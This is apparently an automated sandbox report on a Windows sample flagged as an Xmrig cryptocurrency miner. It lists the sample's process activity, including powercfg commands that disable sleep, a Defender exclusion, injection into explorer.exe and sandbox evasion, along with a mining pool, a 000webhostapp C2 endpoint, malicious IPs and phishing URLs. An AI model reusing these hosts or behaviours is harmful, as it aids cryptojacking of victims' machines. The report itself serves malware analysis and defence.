              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Source: C:\Users\user\Desktop\gq83mrprwy.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\Desktop\gq83mrprwy.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Users\user\Desktop\gq83mrprwy.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
              Source: C:\Users\user\Desktop\gq83mrprwy.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
              Source: C:\ProgramData\xdftdueakusz\vefyedjsvjut.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
              Source: explorer.exe, 0000002C.00000002.4195594913.0000000000B59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Windows Management Instrumentation
              11
              Windows Service
              11
              Windows Service
              2
              Masquerading
              OS Credential Dumping331
              Security Software Discovery
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Service Execution
              1
              DLL Side-Loading
              411
              Process Injection
              1
              Disable or Modify Tools
              LSASS Memory1
              Process Discovery
              Remote Desktop ProtocolData from Removable Media1
              Non-Standard Port
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading
              141
              Virtualization/Sandbox Evasion
              Security Account Manager141
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive1
              Ingress Tool Transfer
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook411
              Process Injection
              NTDS1
              Application Window Discovery
              Distributed Component Object ModelInput Capture3
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information
              LSA Secrets23
              System Information Discovery
              SSHKeylogging4
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Obfuscated Files or Information
              Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              File Deletion
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1432188 Sample: gq83mrprwy.exe Startdate: 26/04/2024 Architecture: WINDOWS Score: 100 61 xmr-eu1.nanopool.org 2->61 63 us-east-1.route-1.000webhost.awex.io 2->63 65 pachydermal-deviati.000webhostapp.com 2->65 83 Multi AV Scanner detection for submitted file 2->83 85 Yara detected Xmrig cryptocurrency miner 2->85 87 Sigma detected: Stop EventLog 2->87 91 2 other signatures 2->91 8 vefyedjsvjut.exe 1 2->8         started        12 gq83mrprwy.exe 1 2 2->12         started        14 chrome.exe 1 2->14         started        17 svchost.exe 1 2 2->17         started        signatures3 89 DNS related to crypt mining pools 61->89 process4 dnsIp5 57 C:\Windows\Temp\zadejssjsckf.sys, PE32+ 8->57 dropped 101 Multi AV Scanner detection for dropped file 8->101 103 Injects code into the Windows Explorer (explorer.exe) 8->103 105 Writes to foreign memory regions 8->105 113 2 other signatures 8->113 19 explorer.exe 8->19         started        23 powershell.exe 8->23         started        25 cmd.exe 8->25         started        35 5 other processes 8->35 59 C:\ProgramData\...\vefyedjsvjut.exe, PE32+ 12->59 dropped 107 Uses powercfg.exe to modify the power settings 12->107 109 Adds a directory exclusion to Windows Defender 12->109 111 Modifies power options to not sleep / hibernate 12->111 27 powershell.exe 23 12->27         started        29 cmd.exe 1 12->29         started        31 powercfg.exe 1 12->31         started        37 7 other processes 12->37 75 192.168.2.16 unknown unknown 14->75 77 192.168.2.4, 10343, 138, 443 unknown unknown 14->77 81 2 other IPs or domains 14->81 33 chrome.exe 14->33         started        79 127.0.0.1 unknown unknown 17->79 file6 signatures7 process8 dnsIp9 67 51.15.65.182, 10343, 49752 OnlineSASFR France 19->67 69 145.14.144.16, 443, 49774, 49782 AWEXUS Netherlands 19->69 71 us-east-1.route-1.000webhost.awex.io 145.14.144.253, 443, 49753, 49764 AWEXUS Netherlands 19->71 93 System process connects to network (likely due to code injection or exploit) 19->93 95 Query firmware table information (likely to detect VMs) 19->95 97 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 19->97 39 conhost.exe 23->39         started        51 2 other processes 25->51 99 Loading BitLocker PowerShell Module 27->99 41 conhost.exe 27->41         started        43 conhost.exe 29->43         started        45 wusa.exe 29->45         started        47 conhost.exe 31->47         started        73 www.google.com 142.250.64.196, 443, 49733, 49734 GOOGLEUS United States 33->73 53 4 other processes 35->53 49 conhost.exe 37->49         started        55 6 other processes 37->55 signatures10 process11

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              gq83mrprwy.exe63%ReversingLabsWin64.Trojan.Generic
              gq83mrprwy.exe56%VirustotalBrowse
              SourceDetectionScannerLabelLink
              C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe63%ReversingLabsWin32.Trojan.Generic
              C:\ProgramData\xdftdueakusz\vefyedjsvjut.exe58%VirustotalBrowse
              C:\Windows\Temp\zadejssjsckf.sys5%ReversingLabs
              C:\Windows\Temp\zadejssjsckf.sys3%VirustotalBrowse
              No Antivirus matches
              SourceDetectionScannerLabelLink
              us-east-1.route-1.000webhost.awex.io1%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://crl.ver)0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              www.google.com
              142.250.64.196
              truefalse
                high
                xmr-eu1.nanopool.org
                212.47.253.124
                truefalse
                  high
                  us-east-1.route-1.000webhost.awex.io
                  145.14.144.253
                  truetrueunknown
                  pachydermal-deviati.000webhostapp.com
                  unknown
                  unknownfalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://www.google.com/async/ddljson?async=ntp:2false
                      high
                      https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                        high
                        https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGKv9rrEGIjCUP8rJI6uQpcCA_sA23NWIvsltkwq3MeDorQiPFEiOdS9-9s9TL79P98P43HdQwyEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
                          high
                          https://pachydermal-deviati.000webhostapp.com/api/endpoint.phpfalse
                            high
                            https://www.google.com/async/newtab_promosfalse
                              high
                              https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0false
                                high
                                https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGKv9rrEGIjD60VmSgpC6cOPMVPM6iFgI5KUXbg-hj5Slfx8AmR1Y-wEuAbZfNmjYd7xW-s1FHlsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
                                  high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://g.live.com/odclientsettings/Prod.C:edb.log.5.drfalse
                                    high
                                    https://pachydermal-deviati.000webhostapp.com/api/endpoint.php.explorer.exe, 0000002C.00000002.4195594913.0000000000C2D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://g.live.com/odclientsettings/ProdV2edb.log.5.drfalse
                                        high
                                        https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000005.00000003.1769186982.000001F4E90C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.5.drfalse
                                          high
                                          http://ocsp.cloudflare.com/origin_ca0explorer.exe, 0000002C.00000002.4195594913.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000002.4196308144.00000000014A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://crl.cloudflare.com/origin_ca.crlexplorer.exe, 0000002C.00000002.4196308144.00000000014A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://pachydermal-deviati.000webhostapp.com/api/endpoint.phprdurxnlmtixfcpxrexplorer.exe, 0000002C.00000003.1951826740.0000000000BB2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://crl.cloudflare.com/origin_ca.crl0explorer.exe, 0000002C.00000002.4195594913.0000000000BB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://crl.ver)svchost.exe, 00000005.00000002.4197962632.000001F4E8E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  low
                                                  http://ocsp.cloudflare.com/origin_caexplorer.exe, 0000002C.00000002.4195594913.0000000000BB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://g.live.com/odclientsettings/ProdV2.C:edb.log.5.drfalse
                                                      high
                                                      https://pachydermal-deviati.000webhostapp.com/api/endpoint.php--cinit-version=3.4.0--nicehash--tls--explorer.exe, 0000002C.00000002.4195594913.0000000000B95000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://pachydermal-deviati.000webhostapp.com/api/endpoint.php.exeeexplorer.exe, 0000002C.00000003.3172922622.0000000000C30000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000003.2002127076.0000000000C30000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002C.00000002.4195594913.0000000000C2D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://crl.cloudflare.com/origin_ca.crlfexplorer.exe, 0000002C.00000002.4196308144.00000000014A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000005.00000003.1769186982.000001F4E90C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drfalse
                                                              high
                                                              https://pachydermal-deviati.000webhostapp.com/api/endpoint.phpDexplorer.exe, 0000002C.00000002.4195594913.0000000000B95000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                51.15.65.182
                                                                unknownFrance
                                                                12876OnlineSASFRtrue
                                                                145.14.144.16
                                                                unknownNetherlands
                                                                204915AWEXUStrue
                                                                142.250.64.196
                                                                www.google.comUnited States
                                                                15169GOOGLEUSfalse
                                                                239.255.255.250
                                                                unknownReserved
                                                                unknownunknownfalse
                                                                145.14.144.253
                                                                us-east-1.route-1.000webhost.awex.ioNetherlands
                                                                204915AWEXUStrue
                                                                IP
                                                                192.168.2.16
                                                                192.168.2.4
                                                                192.168.2.5
                                                                127.0.0.1
                                                                Joe Sandbox version:40.0.0 Tourmaline
                                                                Analysis ID:1432188
                                                                Start date and time:2024-04-26 16:47:08 +02:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 9m 49s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:47
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:gq83mrprwy.exe
                                                                renamed because original name is a hash value
                                                                Original Sample Name:3b43da1be0c39802b78f6b2c55c4d7e6.exe
                                                                Detection:MAL
                                                                Classification:mal100.spyw.evad.mine.winEXE@74/18@9/9
                                                                EGA Information:
                                                                • Successful, ratio: 100%
                                                                HCA Information:
                                                                • Successful, ratio: 100%
                                                                • Number of executed functions: 5
                                                                • Number of non-executed functions: 23
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                • Excluded IPs from analysis (whitelisted): 142.250.64.227, 142.250.217.238, 74.125.139.84, 34.104.35.123, 23.45.182.80, 23.204.76.112, 192.229.211.108, 199.232.210.172, 142.250.189.131, 172.217.2.206
                                                                • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, e16604.g.akamaiedge.net, update.googleapis.com, clients.l.google.com, prod.fs.microsoft.com.akadns.net
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                TimeTypeDescription
                                                                16:48:02API Interceptor1x Sleep call for process: gq83mrprwy.exe modified
                                                                16:48:05API Interceptor32x Sleep call for process: powershell.exe modified
                                                                16:48:08API Interceptor2x Sleep call for process: svchost.exe modified
                                                                SourceURL
                                                                Screenshothttp://
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                239.255.255.250http://url9212.charteredarena.org/ls/click?upn=u001.kjyKVeM-2Fb1rGOGHOnr1jOBOY3L3JqbNTsl6-2FG2Q28FBbMvScULOdn5hj4fYmOT1gSvNV_eFFQU5nW4TX33oYM-2FvMZ4H4nrQnEbWOt7nYb46lhhradIe8kQ30nH41Yux5-2ByqjXVzNOeRGeH70TSwGBG-2FsCyfS-2BqFuy7r7yA-2BMVhshonhVyPepAGojJAWOStPfHQEXVhS9QapMz6-2FLiLkIDitr77rwl6cV3-2BOVbi0qMHcpubANPDna-2BAJRWKHhsn2J-2BHsm2h-2B1n0PvhIvECyeSGKW-2FdmoYnwMnfXv-2F0VHDQdAF4JyTklFAWOdWvqmq9QaL29M0Lqvm9PdkAaDucmiv1yWhzGJ-2FSlIlic4yMaUzKSM2tXbVKRT-2BcTJHrLGjV82z-2BxMi-2FPWDvS9vQSeDz0xjN0gvzYnMQqfZiJ7fdvgXYvIvcGvziknMmHkQ7sUHmtLIGr6gsv-2FI2qInnZxnaJ1Ow7w3sMmgc-2FLcAEaJe5QnWJ5qez1H3mc7J1f4VLI4PyjCxv7syUPC13rDkwMklRiABfKztYQ3n9LW3FeH4hgMGYJgJovBs-2FKlVUipIzO24iLrfZpg-2FS6-2Fvp-2BRnBXh4Gim5LY7NxdelnIZomgKJ8r1gxfM163jd5ekCcUFZcZJn8BUr-2FrBOq6vvyf5Ut44ln9oAHSsmy2ecvwUHxQ-2Bo0mJA2r9a8FeSV3APNVBZowUa1ZGpOSvbZRLc6uZxrFl3fSWY774fhm-2Fl3qG7s-2BRWj2lGIHB3NEqH1X520Diu5Le7soeKgWoeaLCSrT5v7lt-2B7XayjukGYP4Yz5jSqZD2gXDxl443sgS6brqBQ3LKHfRN7s2NZ-2F6nWblHw6-2BLG-2FTduGCq0lMfhnVz7mFWLyKhJHvoE3C2dN6qv1-2FpHnRcIGopoYVEdZ-2F182c7Ll7OsxlzgTKemGKriHFjxwOhwkIoHVdgcJWnLS8-3DGet hashmaliciousUnknownBrowse
                                                                  https://runrun.it/share/form/0GZMCgHSxRh4PBOMGet hashmaliciousHTMLPhisherBrowse
                                                                    Dragons Dogma 2 v1.0 Plus 36 Trainer.exeGet hashmaliciousUnknownBrowse
                                                                      http://421225.tctm.xyzGet hashmaliciousUnknownBrowse
                                                                        InmateExport.exeGet hashmaliciousUnknownBrowse
                                                                          http://www.technology-trend.comGet hashmaliciousUnknownBrowse
                                                                            https://islandwaysorbet.comGet hashmaliciousUnknownBrowse
                                                                              https://gelw.nalverd.com/AvGEoxV/Get hashmaliciousHTMLPhisherBrowse
                                                                                http://www.technology-trend.comGet hashmaliciousUnknownBrowse
                                                                                  http://svif-venezuela.com/Get hashmaliciousUnknownBrowse
                                                                                    51.15.65.1821DI50gCNGQ.exeGet hashmaliciousGlupteba, RedLine, SmokeLoader, Vidar, XmrigBrowse
                                                                                      file.exeGet hashmaliciousGlupteba, LummaC Stealer, RedLine, SmokeLoader, Stealc, Vidar, XmrigBrowse
                                                                                        file.exeGet hashmaliciousXmrigBrowse
                                                                                          file.exeGet hashmaliciousXmrigBrowse
                                                                                            file.exeGet hashmaliciousXmrigBrowse
                                                                                              file.exeGet hashmaliciousXmrigBrowse
                                                                                                file.exeGet hashmaliciousXmrigBrowse
                                                                                                  file.exeGet hashmaliciousXmrigBrowse
                                                                                                    setup.EXE.exeGet hashmaliciousXmrigBrowse
                                                                                                      file.exeGet hashmaliciousXmrigBrowse
                                                                                                        145.14.144.16AMED.exeGet hashmaliciousFormBookBrowse
                                                                                                        • www.mifurgoentuangar.fun/ip45/?m0=l5EGGChEHj4XKN27dCEHr2wkAcrDBQItB+yEuOqKGof0SFC5OzasTxaDHB4NbpCaaijfls7fEGA1iWY4ma9i/Owpa/X5BDzkgQ==&GA0=9iZUftTB6fwR16
                                                                                                        145.14.144.253REMITT#U007e0.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          xmr-eu1.nanopool.orgSecuriteInfo.com.Win64.TrojanX-gen.22735.27744.exeGet hashmaliciousXmrigBrowse
                                                                                                          • 51.15.193.130
                                                                                                          ft1i6jvAdD.exeGet hashmaliciousXmrigBrowse
                                                                                                          • 141.94.23.83
                                                                                                          vS3C07uH19.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, XmrigBrowse
                                                                                                          • 51.255.34.118
                                                                                                          kGsmMpk9kX.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, XmrigBrowse
                                                                                                          • 51.68.190.80
                                                                                                          huUaO72kiE.exeGet hashmaliciousXmrig, zgRATBrowse
                                                                                                          • 51.15.58.224
                                                                                                          O1GEDfxZO0.exeGet hashmaliciouszgRATBrowse
